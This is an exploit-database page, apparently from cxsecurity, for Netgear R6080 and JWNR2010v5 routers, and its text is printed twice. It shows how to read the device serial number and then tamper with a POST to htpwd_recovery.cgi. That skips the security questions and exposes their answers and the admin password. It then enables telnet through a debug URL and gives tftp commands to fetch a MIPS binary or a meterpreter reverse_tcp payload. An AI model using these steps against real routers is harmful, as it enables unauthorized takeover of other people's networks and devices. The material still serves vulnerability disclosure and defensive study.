Netgear WiFi Router JWNR2010v5 / R6080 Authentication Bypass

2019.07.16
Credit: Wadeek
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: R6080-100PES # Firmware Version: 1.0.0.34 / 1.0.0.40 # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip) == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.0.0.34WW Model=R6080 >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) <serialNumber>SSSSSSSNNNNNN</serialNumber> == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat recovery process for get admin password) == Authenticated Telnet Command Execution == >> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug :~$ telnet 192.168.1.1 R6080 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] } # Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: R6080-100PES # Firmware Version: 1.0.0.34 / 1.0.0.40 # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip) == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.0.0.34WW Model=R6080 >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) <serialNumber>SSSSSSSNNNNNN</serialNumber> == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat recovery process for get admin password) == Authenticated Telnet Command Execution == >> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug :~$ telnet 192.168.1.1 R6080 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top